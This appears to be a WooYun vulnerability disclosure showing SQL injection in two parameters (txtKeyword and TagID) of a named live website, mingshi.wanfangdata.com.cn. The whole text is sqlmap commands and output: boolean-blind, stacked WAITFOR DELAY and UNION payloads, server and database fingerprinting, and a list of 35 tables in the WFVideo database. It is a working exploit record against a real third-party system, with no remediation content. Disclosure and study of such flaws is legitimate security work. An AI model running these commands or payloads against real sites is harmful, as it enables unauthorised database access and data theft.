WooYun.org

sqlmap.py -u "http://mingshi.wanfangdata.com.cn/Personal/ScholarResponse.aspx" --data "__VIEWSTATE=iNrZdGRIN3kvd2wPcm9SDvGjBbPE3NBWr9RS94ebuZ9HeDn3s0R0nw50Ggl7MhH1YElPh4DhaqKz5YJ%2FPuBJGWwQYE0WEGDpQXTDSiFgivHx6Zivn%2BTKxj7UdhFan%2Bwt%2F97HvqQyhYf1W7aItPgNV3beFAGkzL54%2FBzFXfN6Do3t4TewOS%2FTMn%2FgR4nV9kaSoU%2BSVbO1NikoUbN8UxBevJVrUdeYynVWF0avNSHUPB4M6zPOVQ%2FOyO91aZdpm9C3QrxMnoWYSA73wjrBCeV3ZvDXwmU3Tj5TtiAx4RUj0dCGUSdq1tkDJDiLkQZxjuD%2FOjn9S4vh6doNX8FTzQzTHAwmNPcea3dAaizPRL%2FDHC43JWiusK10XQo7VVdte2jFxsKpIqOJse3B4Kl6jCWGZBAM2fWfJgXvsUGIiuSr33Oj%2F13udKuoFkATSeSSdPD2VqTfQgkU3cM76mMei3HL%2FUK9mqCuOYcnwj9eoeu90rIgAQyX0S6VjLUXQlqiO%2Buf7%2BUL0bUDPZ2jcTchKkxFa0IpYb84TbOyYQ%2B7U%2F%2FW4psUF9t%2FW%2FX2fYWEEBUdzLD%2BPgQ%2Fvp%2FhPdMQSIZ99S88twRV5%2BhJ0DpNDFl5XE%2BdWpTSNl9NwPatKFsi9sWIIAI%2BdLqM9wxv1aUScZrVjWxo9c%2FjOToS7Ovk%2FVatRgPvYwyWd216H8xE7xgB5ktt0mCUcGLWAMDd1qbdrva80OT8gnxUQiJYBHtMeN1cJNZsEc0ArdIhA5iPEeaNGSBf6d16kimT66F8FDGyznhDJoC6V8HI8MZlw5YD99Im4PXez4nsjWyk6HfopnDh2uTK2D5yMZpDKF8gF5DfWq0nz5xhpgMfpVp6UbDVl4SBXqjFn3sQXHFwdxuc1QwjnMMRagdklBlBdgZN%2B3S%2FLKYFOGmLYhOn7timvBQqRwTgORqL79v7Qh%2FncP56hE2l8O8E9KrApquejXNJh1o3i7r1xkICb3%2BQxzWmyVfhv%2F8Gxu2ThOPjPcUj34Cb0VXaXQ64ZOLnp5YvlKw9CsTrVrcQtypB7HjWpNvyZN0sm2M5RiH0v6tmyJPGG6pjoXRrb98DncEIMgc%2B5thvCRj32liQ%2FZq%2BCvXNS2wjgZO%2FsIi%2BX%2Fd%2BaY6ZYYJTWm9NyQuwct%2Fw5GAIPt1Mvf3%2FuQn58zF%2BOctg7bhlABEtzIh3g2ykIKD%2FNXKfGRWR8IcHbzLBoNcraKVvhWqvQKa83rpGq0MlEXedQpRlCwj%2BYVYCReJC9yqUg7TrYgyNDskFUB9cPy8lG81Cgs2TA8NV0VfamBekaICXFaS1A52Y9zaXGjWt1sP15rPB%2F6b7ll3I4SiDONaIhfOJoNxt3AS%2BOHJoLKxGM7CbnghE6t2Ios4vFz%2B239HGC75RgKTlsUf4cmZzMazSgGzcMNILZ4KvKCOeAc6KO6qWtfIawySTbfsywmq2Is6V1lN83%2FD5jK%2Fs1PCb0OynYNG6cH73oe4LFUX0uaQcHL0ymFqdEQDTSMefz9kH0IC%2FFGC%2FQnzdaosNvqQt5a5pw6n77gIqj8P3DWfTdrpJC2gK%2FUNA8RFFr%2Fd%2FNgQdr1SBbGXlxLntUhozcEcdfjsG8EsL1630H5Kd1bPv7IqPR37DB1w8UQwH007IvXLfl7B5WL8%2FJSKnujfD2iq4wZT1WGmM9zZiVqiEWTG%2F3Q4xczP%2BadVysJtKFHBuziv70XrElCkgdanv46Rf4sImI0LH8AWYQu3tSvJcLoUH6gZpZ3cXzFBmXD%2FIj%2F%2FlMoRX8xNMCWQViGkJVJbusCFM%2FFOe2jw%2BO7Td%2FwlE8Pm32DZ4cyzL1ZunI9VOTejgQ7baq4je2M0BOGts3YFBk5EHU6izETDA8z%2FkgN%2B9cPnmaAx25HglCtqPpJI%3D&__VIEWSTATEGENERATOR=531CEFC2&__VIEWSTATEENCRYPTED=88952634&__EVENTVALIDATION=3ATB46%2FsIFr78ZFkz%2Bw7kvu0nzvLMrI3YW2RYEuwyFrYbvRc9yTcF9UT80SvE4j5GqaurlO1%2BqxoYZmcjhhjvZFZKQbh2uK2QfB0MSsqJeRTGrD%2F&Button3=%E6%9F%A5%E8%AF%A2&txtKeyword=88952634"

参数:txtKeyword

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtKeyword (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __VIEWSTATE=5i49YkAoU5IlVVehBmequT2uKVJK8i+90wHyaprnYJsV8jdW1GMacV7FobdtHG2GryRXcwlNMf3XupfgawKdBUqW8nDvxztNdgOK2StuCXdGKA/L6nkPmY1Q3pOsSfUHPqQU3KMoDrYo1IkspNGehdZ0GJWrp68H4ovXUHf+5GAj2R74Aa7GjhShV8Nn8oAcFsK7m1DBWAGtt2HwAosapmpZWrusNegh1lTTieODvyrLj1KLfeFOb66TOj1yR8SwHnNyQIfx5s9gtoEOkak/hw8/r7ss6puiKLzId9rkl5PQIb8EioqGSn/zerEKf+AfNBLjvvD8c3sehvEv8fKIV/UT46Ci+AmIoqvTDAYOvbYQ7RmFDzjb4itXG2aue3aMHPXqziTiqTcXvCnsXIDOhBkTK3CYMhc+rUwPozg//2cvl446W0ca7DAIcHN20mmXQ8ODWBP4iJsQ+HRDIgL/W6fV7uzf/SR2XY2yswGUfbB6aB5xVll6WNYI42gwHlwKPgt8SJn/Eza8D0k0gX8LnjbpBbcz99yzZxFz1E2umuEwg9PPDBPqdnw7rSYMW3iL0o5PNLeq5r2DjjveOEZff/Q3BiO/7lhSpZNV/iWLZwiUxVzauKRuB7skGSUJORcH5EwS3rZk0pJqVHg57XjfYbyMD4qQ/bOt+Sm5mPzOglnlwee7EHimp0GI9oVfTl8Z0oPWDgNXKUbhaIojmK8LNiXThnbybTyzMHLDaiwNPWfh+E5NzWJ9myckhXx4W97WOTjYEw==&__VIEWSTATEGENERATOR=531CEFC2&__VIEWSTATEENCRYPTED=88952634&__EVENTVALIDATION=G2U9Fw8TXrvDagRSE/WK/xsMhoFhXb4k5g4BATeGfJIspsVZaNdTksOe8NTNvDi7A7lW9J/Uwx0SsF+JjJkT+ZHAUN2C1CZHzcx6/QzxfAldAyoH&Button3=%E6%9F%A5%E8%AF%A2&txtKeyword=1%' AND 8224=8224 AND '%'='
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=5i49YkAoU5IlVVehBmequT2uKVJK8i+90wHyaprnYJsV8jdW1GMacV7FobdtHG2GryRXcwlNMf3XupfgawKdBUqW8nDvxztNdgOK2StuCXdGKA/L6nkPmY1Q3pOsSfUHPqQU3KMoDrYo1IkspNGehdZ0GJWrp68H4ovXUHf+5GAj2R74Aa7GjhShV8Nn8oAcFsK7m1DBWAGtt2HwAosapmpZWrusNegh1lTTieODvyrLj1KLfeFOb66TOj1yR8SwHnNyQIfx5s9gtoEOkak/hw8/r7ss6puiKLzId9rkl5PQIb8EioqGSn/zerEKf+AfNBLjvvD8c3sehvEv8fKIV/UT46Ci+AmIoqvTDAYOvbYQ7RmFDzjb4itXG2aue3aMHPXqziTiqTcXvCnsXIDOhBkTK3CYMhc+rUwPozg//2cvl446W0ca7DAIcHN20mmXQ8ODWBP4iJsQ+HRDIgL/W6fV7uzf/SR2XY2yswGUfbB6aB5xVll6WNYI42gwHlwKPgt8SJn/Eza8D0k0gX8LnjbpBbcz99yzZxFz1E2umuEwg9PPDBPqdnw7rSYMW3iL0o5PNLeq5r2DjjveOEZff/Q3BiO/7lhSpZNV/iWLZwiUxVzauKRuB7skGSUJORcH5EwS3rZk0pJqVHg57XjfYbyMD4qQ/bOt+Sm5mPzOglnlwee7EHimp0GI9oVfTl8Z0oPWDgNXKUbhaIojmK8LNiXThnbybTyzMHLDaiwNPWfh+E5NzWJ9myckhXx4W97WOTjYEw==&__VIEWSTATEGENERATOR=531CEFC2&__VIEWSTATEENCRYPTED=88952634&__EVENTVALIDATION=G2U9Fw8TXrvDagRSE/WK/xsMhoFhXb4k5g4BATeGfJIspsVZaNdTksOe8NTNvDi7A7lW9J/Uwx0SsF+JjJkT+ZHAUN2C1CZHzcx6/QzxfAldAyoH&Button3=%E6%9F%A5%E8%AF%A2&txtKeyword=1%';WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: __VIEWSTATE=5i49YkAoU5IlVVehBmequT2uKVJK8i+90wHyaprnYJsV8jdW1GMacV7FobdtHG2GryRXcwlNMf3XupfgawKdBUqW8nDvxztNdgOK2StuCXdGKA/L6nkPmY1Q3pOsSfUHPqQU3KMoDrYo1IkspNGehdZ0GJWrp68H4ovXUHf+5GAj2R74Aa7GjhShV8Nn8oAcFsK7m1DBWAGtt2HwAosapmpZWrusNegh1lTTieODvyrLj1KLfeFOb66TOj1yR8SwHnNyQIfx5s9gtoEOkak/hw8/r7ss6puiKLzId9rkl5PQIb8EioqGSn/zerEKf+AfNBLjvvD8c3sehvEv8fKIV/UT46Ci+AmIoqvTDAYOvbYQ7RmFDzjb4itXG2aue3aMHPXqziTiqTcXvCnsXIDOhBkTK3CYMhc+rUwPozg//2cvl446W0ca7DAIcHN20mmXQ8ODWBP4iJsQ+HRDIgL/W6fV7uzf/SR2XY2yswGUfbB6aB5xVll6WNYI42gwHlwKPgt8SJn/Eza8D0k0gX8LnjbpBbcz99yzZxFz1E2umuEwg9PPDBPqdnw7rSYMW3iL0o5PNLeq5r2DjjveOEZff/Q3BiO/7lhSpZNV/iWLZwiUxVzauKRuB7skGSUJORcH5EwS3rZk0pJqVHg57XjfYbyMD4qQ/bOt+Sm5mPzOglnlwee7EHimp0GI9oVfTl8Z0oPWDgNXKUbhaIojmK8LNiXThnbybTyzMHLDaiwNPWfh+E5NzWJ9myckhXx4W97WOTjYEw==&__VIEWSTATEGENERATOR=531CEFC2&__VIEWSTATEENCRYPTED=88952634&__EVENTVALIDATION=G2U9Fw8TXrvDagRSE/WK/xsMhoFhXb4k5g4BATeGfJIspsVZaNdTksOe8NTNvDi7A7lW9J/Uwx0SsF+JjJkT+ZHAUN2C1CZHzcx6/QzxfAldAyoH&Button3=%E6%9F%A5%E8%AF%A2&txtKeyword=1%' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(71)+CHAR(104)+CHAR(67)+CHAR(109)+CHAR(105)+CHAR(75)+CHAR(104)+CHAR(77)+CHAR(116)+CHAR(108)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: WFVideo
[35 tables]
+---------------------+
| AccountLog          |
| ArticleCategory     |
| ArticleCategory     |
| ArticleComment      |
| Discount            |
| Email               |
| GroupDiscount       |
| GroupDiscount       |
| GroupVideoCategory  |
| IPRule              |
| MailBoxLog          |
| MailBoxLog          |
| MeetingScholar      |
| MeetingSpace        |
| MeetingVideo        |
| Operation           |
| RoleOperation       |
| RoleOperation       |
| ScholarSpaceComment |
| ScholarSpaceComment |
| ScholarVideo        |
| Tag                 |
| UnitScholar         |
| UnitSpace           |
| UnitVideo           |
| UserFavorite        |
| UserFavorite        |
| UserGroup           |
| UserRole            |
| VideoCategory       |
| VideoCategory       |
| VideoComment        |
| VideoPlayLog        |
| VideoTag            |
| sysdiagrams         |
+---------------------+

第二处：sqlmap.py -u "http://mingshi.wanfangdata.com.cn/Subject.aspx?TagID=18"

参数：TagID

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: TagID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: TagID=18) AND 6837=6837 AND (9602=9602
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: TagID=18);WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database:    'WFVideo'